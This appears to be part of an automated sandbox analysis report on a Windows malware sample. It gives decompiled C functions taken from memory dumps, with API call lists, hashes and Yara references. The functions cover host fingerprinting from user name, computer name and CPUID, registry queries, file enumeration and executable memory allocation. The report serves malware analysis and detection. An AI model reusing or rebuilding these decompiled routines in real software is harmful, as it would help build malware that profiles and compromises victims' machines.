				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0xfad2e0;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E00FA7DD8(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E00FA8DEA(_t19);
					if(_t20 == 0) {
						HeapFree( *0xfad1f0, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0xfad2e8; // 0x3a49be8
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x00fa3f8a
0x00fa3f91
0x00fa3f94
0x00fa3f9b
0x00fa3fa0
0x00fa3fa2
0x00fa3fa9
0x00fa3fb0
0x00000000
0x00000000
0x00fa3fb2
0x00fa3fb7
0x00fa3fb8
0x00fa3fbf
0x00fa3fd9
0x00000000
0x00fa3fc1
0x00fa3fc1
0x00fa3fc3
0x00fa3fc6
0x00fa3fca
0x00000000
0x00000000
0x00fa3fcc
0x00fa3fca
0x00fa3fe3
0x00fa3fe5
0x00fa3feb
0x00fa3fed
0x00fa3ff3
0x00fa3ffa
0x00fa400a
0x00fa4002
0x00fa4005
0x00fa4005
0x00fa400d
0x00fa400d
0x00fa4017
0x00fa4017
0x00fa3fdf
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FA3FA0

Part of subcall function 00FA7DD8: RtlAllocateHeap.NTDLL(00000000,63699BC3,00FAD2E0), ref: 00FA7E03
Part of subcall function 00FA7DD8: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00FA7E25
Part of subcall function 00FA7DD8: memset.NTDLL ref: 00FA7E3F
Part of subcall function 00FA7DD8: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00FA7E7D
Part of subcall function 00FA7DD8: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00FA7E91
Part of subcall function 00FA7DD8: CloseHandle.KERNEL32(?), ref: 00FA7EA8
Part of subcall function 00FA7DD8: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00FA7EB4
Part of subcall function 00FA7DD8: lstrcat.KERNEL32(?,642E2A5C), ref: 00FA7EF5
Part of subcall function 00FA7DD8: FindFirstFileA.KERNELBASE(?,?), ref: 00FA7F0B

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FA3FE5

Part of subcall function 00FA8DEA: lstrlen.KERNEL32(?,00FAD2E0,73BB7FC0,00000000,00FA3FBD,?,?,?,?,?,00FA9865,?), ref: 00FA8DF3
Part of subcall function 00FA8DEA: mbstowcs.NTDLL ref: 00FA8E1A
Part of subcall function 00FA8DEA: memset.NTDLL ref: 00FA8E2C

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00FA9865,?), ref: 00FA3FD9

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: Wow64$FileHeap$AllocateEnableRedirectionmemset$CloseCreateFindFirstFreeHandleTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 94831996-0
Opcode ID: d4a9666ee5c1f372652db706a55400dfbb2282623b9fff5acb49bc4a1148ff4b
Instruction ID: 42be2c4a244fc0baa046fca37e6404d9f087f391186e88ae293c5b4c0f923ffc
Opcode Fuzzy Hash: d4a9666ee5c1f372652db706a55400dfbb2282623b9fff5acb49bc4a1148ff4b
Instruction Fuzzy Hash: 0F1104F6A10208EEEB009B95DC44BE9B7B8EF86368F204026F501D7190C3B5AE41FB64

Uniqueness

Uniqueness Score: -1.00%

Function 00FAA881, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FAA881(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xfad230; // 0x2a9a5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xfaea60; // 0x4f0053
				_v16 = 4;
				_t31 = E00FA230C(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xfad230; // 0x2a9a5a8
					_t5 = _t19 + 0xfaeabc; // 0x6e0049
					_t34 = E00FA230C(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00FAA07B(_t34);
					}
					E00FAA07B(_t31);
				}
				return _v8;
			}

0x00faa887
0x00faa88c
0x00faa891
0x00faa898
0x00faa8a4
0x00faa8a8
0x00faa8aa
0x00faa8b0
0x00faa8bc
0x00faa8c0
0x00faa8d3
0x00faa8db
0x00faa8ef
0x00faa8f7
0x00faa8f9
0x00faa8f9
0x00faa900
0x00faa900
0x00faa907
0x00faa907
0x00faa90d
0x00faa912
0x00faa918

APIs

Part of subcall function 00FA230C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00FAA8A4,004F0053,00000000,?), ref: 00FA2315
Part of subcall function 00FA230C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00FAA8A4,004F0053,00000000,?), ref: 00FA233F
Part of subcall function 00FA230C: memset.NTDLL ref: 00FA2353

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00FAA8D3
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00FAA8EF
RegCloseKey.ADVAPI32(00000000), ref: 00FAA900

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 0fb328eb5e403f06097f8f883e00d15c3de420bc1f2af80ba7890004448e42b0
Instruction ID: 7acd57520bb6888dadfc24bc1a6a90fadcc18d1b33265a93f860bc137b4f13d4
Opcode Fuzzy Hash: 0fb328eb5e403f06097f8f883e00d15c3de420bc1f2af80ba7890004448e42b0
Instruction Fuzzy Hash: CE115EF2A0020DBBDB11DBA4DC85FAF77FCAB46700F144099B602E6051D774DA09EB65

Uniqueness

Uniqueness Score: -1.00%

Function 00FA974B, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00FA974B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00FA8291(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xfad230; // 0x2a9a5a8
						_t20 = _t68 + 0xfae1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00FA96FE(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00fa9751
0x00fa9754
0x00fa9764
0x00fa976d
0x00fa9771
0x00fa983f
0x00fa9845
0x00fa9845
0x00fa978b
0x00fa9790
0x00fa9794
0x00fa979a
0x00fa979f
0x00fa97a6
0x00fa97b5
0x00fa97b5
0x00fa97b9
0x00fa97bb
0x00fa97c7
0x00fa97d2
0x00fa97dd
0x00fa97e1
0x00fa97eb
0x00fa97ef
0x00fa97f1
0x00fa97f6
0x00fa97fd
0x00fa980d
0x00fa980d
0x00fa97f6
0x00fa97ef
0x00fa980f
0x00fa9814
0x00fa9819
0x00fa9819
0x00fa981f
0x00fa9825
0x00fa982a
0x00fa982a
0x00fa982f
0x00fa9834
0x00fa9834
0x00fa982f
0x00fa97b9
0x00fa9836
0x00fa983c
0x00000000

APIs

Part of subcall function 00FA8291: SysAllocString.OLEAUT32(80000002), ref: 00FA82E8
Part of subcall function 00FA8291: SysFreeString.OLEAUT32(00000000), ref: 00FA834D

SysFreeString.OLEAUT32(?), ref: 00FA982A
SysFreeString.OLEAUT32(00FA8812), ref: 00FA9834

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: f7b1018cef060f6bc4ebb41bb94c404b77deac77b4d69fad765bb1fbf2d84365
Instruction ID: 96df207b3e14c48be093fd7eb4744ac4c471b0ad212420a80b51c0c1a5e0b356
Opcode Fuzzy Hash: f7b1018cef060f6bc4ebb41bb94c404b77deac77b4d69fad765bb1fbf2d84365
Instruction Fuzzy Hash: A6316BB2900118AFCB21DF69CC88C9BBB7AFFCA750B148668F8059B210D775DD51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D5B150, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00D5B1D4

Strings

VirtualAlloc, xrefs: 00D5B1B9, 00D5B1BC

Memory Dump Source

Source File: 00000000.00000002.1202733417.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: c94d233bbf15640b7285fdc9c601c586a4a007ce24807e6f425c351bb2fad5f9
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 41113360D0828DDEEF01D7E884057EEBFB55F11705F044099D9446A282D2BA575887B6

Uniqueness

Uniqueness Score: -1.00%

Function 00FAA53C, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement( &E00FAD1F4) == 0) {
						E00FA4ACE();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement( &E00FAD1F4) == 1) {
						_t10 = E00FA24C2(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x00faa543
0x00faa544
0x00faa547
0x00faa579
0x00faa57b
0x00faa57b
0x00faa549
0x00faa54a
0x00faa55f
0x00faa566
0x00faa568
0x00faa568
0x00faa566
0x00faa54a
0x00faa583

APIs

InterlockedIncrement.KERNEL32(00FAD1F4), ref: 00FAA551

Part of subcall function 00FA24C2: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00FA24D7

InterlockedDecrement.KERNEL32(00FAD1F4), ref: 00FAA571

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: ad89bec0c30bb62757816cc54e4ea6558b32e5d202620d274e756400275a4e41
Instruction ID: cc379e0fb9aadec4429e27ba0ed4a73228d22b2a0fb0a4d7d2bbc9914527067f
Opcode Fuzzy Hash: ad89bec0c30bb62757816cc54e4ea6558b32e5d202620d274e756400275a4e41
Instruction Fuzzy Hash: CBE086F1F441229F96A15BB88C05B5A7B90AF5B7A0F098655F481D0050E750EC44F7EB

Uniqueness

Uniqueness Score: -1.00%

Function 100015F2, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E100015F2(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E10001F65( &_v8,  &_v12,  *0x1000414c ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E10001D76(_t22, _v8,  *0x1000414c ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E10001B13(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x10004110, 0, _v8);
				}
				return _t25;
			}

0x100015f2
0x100015f5
0x100015f6
0x1000160c
0x10001615
0x1000161a
0x10001633
0x1000161c
0x1000162f
0x1000162f
0x10001637
0x10001639
0x10001641
0x10001649
0x10001651
0x10001653
0x10001653
0x10001651
0x10001663
0x10001663
0x1000166e

APIs

StrStrIA.KERNELBASE(00000000,?,?,?,?,00000000,00000000,?,?,?,10001069), ref: 10001649
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,?,?,10001069), ref: 10001663

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 80a6b83c6e39edf17094b2f14d9971a12ee99809f897c52936bdffe07fce5fd9
Instruction ID: 77b2df0c31c442df0a7ae1a47cda52e0b1baf3fbe5944a25a88db2342c455855
Opcode Fuzzy Hash: 80a6b83c6e39edf17094b2f14d9971a12ee99809f897c52936bdffe07fce5fd9
Instruction Fuzzy Hash: BF014476901514BBEB11CBA5CC40EDF7BADEB846C0F154162F901E315CEA31DA4097A4

Uniqueness

Uniqueness Score: -1.00%

Function 00FA4F6C, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00FA4F6C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xfad230; // 0x2a9a5a8
				_t4 = _t15 + 0xfae394; // 0x3a4893c
				_t20 = _t4;
				_t6 = _t15 + 0xfae124; // 0x650047
				_t17 = E00FA974B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00FA230C(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00fa4f76
0x00fa4f78
0x00fa4f7f
0x00fa4f80
0x00fa4f81
0x00fa4f82
0x00fa4f88
0x00fa4f8d
0x00fa4f8d
0x00fa4f97
0x00fa4fa9
0x00fa4fb0
0x00fa4fdf
0x00fa4fb2
0x00fa4fb7
0x00fa4fdc
0x00fa4fb9
0x00fa4fbc
0x00fa4fc3
0x00fa4fce
0x00fa4fc5
0x00fa4fc8
0x00fa4fc8
0x00fa4fd2
0x00fa4fd2
0x00fa4fb7
0x00fa4fe6

APIs

Part of subcall function 00FA974B: SysFreeString.OLEAUT32(?), ref: 00FA982A

Part of subcall function 00FA230C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00FAA8A4,004F0053,00000000,?), ref: 00FA2315
Part of subcall function 00FA230C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00FAA8A4,004F0053,00000000,?), ref: 00FA233F
Part of subcall function 00FA230C: memset.NTDLL ref: 00FA2353

SysFreeString.OLEAUT32(00000000), ref: 00FA4FD2

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 0e0a08a4bfef614e50f4f661e03d8cf108f1f290a5faebfd1ac4a748f0e402cc
Instruction ID: bbc8c8df0fd6334a8534d2bb40d56793b410da453e9cf6abd32048dd60966d26
Opcode Fuzzy Hash: 0e0a08a4bfef614e50f4f661e03d8cf108f1f290a5faebfd1ac4a748f0e402cc
Instruction Fuzzy Hash: E90171B2504129BFDF119F98DD05DAEBBB8FB86714F004465F901E7061D3B0A951E7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00FA8393, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FA8393(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E00FA4F6C(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E00FA7A7D(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0xfad1f0, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x00fa839b
0x00fa83f0
0x00fa83f5
0x00fa839d
0x00fa83b7
0x00fa83bb
0x00fa83c0
0x00fa83c2
0x00fa83d2
0x00fa83de
0x00fa83c4
0x00fa83c4
0x00fa83c7
0x00fa83cc
0x00fa83cc
0x00fa83c2
0x00fa83bb
0x00fa83fb

APIs

Part of subcall function 00FA7A7D: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00FA8849,3D00FAC0,80000002,00FA262A,00000000,00FA262A,?,65696C43,80000002), ref: 00FA7ABF
Part of subcall function 00FA7A7D: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00FA8849,3D00FAC0,80000002,00FA262A,00000000,00FA262A,?,65696C43), ref: 00FA7AE4
Part of subcall function 00FA7A7D: RegCloseKey.ADVAPI32(80000002,?,00FA8849,3D00FAC0,80000002,00FA262A,00000000,00FA262A,?,65696C43,80000002,00000000,?), ref: 00FA7B14

HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,00FA4B5F,?,004F0053,03A49328,00000000,?), ref: 00FA83DE

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$CloseFreeHeap
String ID:
API String ID: 2109406458-0
Opcode ID: 502b182d1adda8b86bd01a615f63d70408679af192f19983f7565a29bf6638d3
Instruction ID: 8084ebab7375c193f15837189a91f7bb40965ae9fca72032ddb83273cefa352c
Opcode Fuzzy Hash: 502b182d1adda8b86bd01a615f63d70408679af192f19983f7565a29bf6638d3
Instruction Fuzzy Hash: 31011D72140289FBCF129F44CC05FAE3B75FB95BA0F148429FA558A160DBB1D921EB64

Uniqueness

Uniqueness Score: -1.00%

Function 00FA98B3, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00FA98B3(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00fa98b3
0x00fa98c0
0x00fa98c1
0x00fa98c2
0x00fa98c9
0x00fa98f7
0x00fa98f8
0x00fa98fb
0x00fa9901
0x00000000
0x00000000
0x00fa98e0
0x00fa98ea
0x00fa98f1
0x00000000
0x00fa98e2
0x00fa98e5
0x00fa9905
0x00fa98e7
0x00fa98e7
0x00000000
0x00fa98e7
0x00fa98e5
0x00fa990c
0x00fa9912
0x00fa9912
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00FA98FB

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f97f2c6bb7274d1fefe0e8fca96ce0555e921d72685190b6c9a1f15f9ee02621
Instruction ID: aece43b153ab8e60c9d5f642293d6e9be4a693358bd8cefae9a84b01206601c0
Opcode Fuzzy Hash: f97f2c6bb7274d1fefe0e8fca96ce0555e921d72685190b6c9a1f15f9ee02621
Instruction Fuzzy Hash: 23F0ECB5D15218EFDB00DB95D488AEEB7B8EF0A754F1080BAE512A3240D7B45B44EB51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00FA8B98, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00FA8B98(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xfad228; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00FA9067( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xfad22c ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8);
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xfad1f0, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00FAA93C(_v8 + _v8, _t63);
							}
							HeapFree( *0xfad1f0, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xfad1f0, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00FAA93C(_v8 + _v8, _t63);
						}
						HeapFree( *0xfad1f0, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00fa8b98
0x00fa8ba0
0x00fa8ba6
0x00fa8ba9
0x00fa8bac
0x00fa8bae
0x00fa8bb3
0x00fa8bb3
0x00fa8bb9
0x00fa8bbb
0x00fa8bc8
0x00fa8c29
0x00fa8bca
0x00fa8bcf
0x00fa8bd5
0x00fa8bda
0x00fa8be8
0x00fa8bec
0x00fa8bfb
0x00fa8c02
0x00fa8c09
0x00fa8c09
0x00fa8c14
0x00fa8c14
0x00fa8bec
0x00fa8bda
0x00fa8c2b
0x00fa8c31
0x00fa8c3b
0x00fa8c3d
0x00fa8c42
0x00fa8c51
0x00fa8c55
0x00fa8c60
0x00fa8c67
0x00fa8c6e
0x00fa8c6e
0x00fa8c7a
0x00fa8c7a
0x00fa8c55
0x00fa8c83
0x00fa8c85
0x00fa8c88
0x00fa8c8a
0x00fa8c8d
0x00fa8c90
0x00fa8c9a
0x00fa8c9e
0x00fa8ca2

APIs

GetUserNameW.ADVAPI32(00000000,00FA725B), ref: 00FA8BCF
RtlAllocateHeap.NTDLL(00000000,00FA725B), ref: 00FA8BE6
GetUserNameW.ADVAPI32(00000000,00FA725B), ref: 00FA8BF3
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00FA725B,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA8C14
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FA8C3B
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00FA8C4F
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FA8C5C
HeapFree.KERNEL32(00000000,00000000), ref: 00FA8C7A

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

